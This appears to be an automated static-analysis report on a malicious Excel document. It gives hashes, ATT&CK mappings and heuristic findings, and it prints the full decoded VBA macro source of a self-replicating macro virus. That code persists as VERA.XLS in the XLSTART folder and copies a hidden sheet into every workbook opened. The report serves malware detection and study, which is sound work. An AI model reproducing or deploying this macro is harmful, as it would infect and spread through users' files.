Xls.Dropper.Agent-6290906-0 — Office (OLE) malware analysis

Static analysis result for SHA-256 58f084cdc061a439…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 31.0 KB
Created: 1996-12-17 01:32:42
Authoring application: Microsoft Excel
First seen: 2014-10-17
MD5: b56de5f0d8cb48c4d616bf4dd2763142
SHA-1: dbf70d5b8ac23536be56e6872118e14d00bd47c9
SHA-256: 58f084cdc061a43986e303c43142b123bba7cffabcf112433c4b84771996f63e
Risk Score: 208

Malware Insights

Xls.Dropper.Agent-6290906-0 · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder
  • T1553.005 Mark-of-the-Web Bypass

The sample is a malicious Excel document containing VBA macros. It leverages the Auto_Open macro to set up an OnSheetActivate hook, which is then used to copy the workbook into the Excel XLSTART startup folder as 'VERA.XLS', establishing persistence. The ClamAV detection name 'Xls.Dropper.Agent-6290906-0' suggests its function as a dropper.

Heuristics 6

  • ClamAV: Xls.Dropper.Agent-6290906-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Dropper.Agent-6290906-0
  • VBA macros detected [medium, 4 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script
        Set x = CreateObject("ADODB.Connection")
  • VBA copies the workbook into the Excel XLSTART startup folder [high] (OLE_VBA_XLSTART_PERSISTENCE)
    The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
    Matched line in script
        ChDir Application.StartupPath
  • VBA infects other workbooks via an OnSheetActivate copy hook [high] (OLE_VBA_WORKBOOK_INFECTION_SPREADER)
    The macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.
    Matched line in script
        Application.OnSheetActivate = "check_files"
  • Auto_Open macro [low] (OLE_VBA_AUTO)
    Auto_Open macro
    Matched line in script
        Sub auto_open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2646 bytes
SHA-256: 9ee0a0a4205a3e31125e335775e5e2d5ee04ef8e6da98200a0341e2c78d163de
First 1,000 lines of the extracted script
Attribute VB_Name = "Locas"



Sub fig()
    
    Set x = CreateObject("ADODB.Connection")
    
    x.Open "Provider=Microsoft.Jet.OLEDB.4.0;Extended Properties=Excel 8.0;Data Source=" & ThisWorkbook.FullName
Sql = "select mid(款号,1,2) & '0000 组', sum(件数) from [货品销售$] group by  mid(款号,1,2)"

    Set yy = x.Execute(Sql)
   [g10:h44].Clear
   [g10].CopyFromRecordset yy
   
        Set yy = Nothing:    Set x = Nothing
End Sub





















Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.OnSheetActivate = "check_files"
End Sub

Sub check_files()
Attribute check_files.VB_ProcData.VB_Invoke_Func = " \n14"
    c$ = Application.StartupPath
    m$ = Dir(c$ & "\" & "VERA.XLS")
    If m$ = "VERA.XLS" Then p = 1 Else p = 0
    If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
    whichfile = p + w * 10
    
Select Case whichfile
    Case 10
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.Name
    Sheets("locas").Visible = True
    Sheets("locas").Select
    Sheets("locas").Copy
    With ActiveWorkbook
        .Title = ""
        .Subject = ""
        .Author = ""
        .Keywords = ""
        .Comments = ""
    End With
    newname$ = ActiveWorkbook.Name
    c4$ = CurDir()
    ChDir Application.StartupPath
    ActiveWindow.Visible = False
    Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "VERA.XLS", FileFormat:=xlNormal _
        , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
        False, CreateBackup:=False
    ChDir c4$
    Workbooks(n4$).Sheets("LOCAS").Visible = False
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "VERA.xls!check_files"
    Case 1
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.Name
    p4$ = ActiveWorkbook.Path
    s$ = Workbooks(n4$).Sheets(1).Name
    If s$ <> "LOCAS" Then
         Workbooks("VERA.XLS").Sheets("LOCAS").Copy before:=Workbooks(n4$).Sheets(1)
    Workbooks(n4$).Sheets("LOCAS").Visible = False
    Else
    End If
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = Tru
    Application.OnSheetActivate = "VERA.xls!check_files"
    Case Else
End Select
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True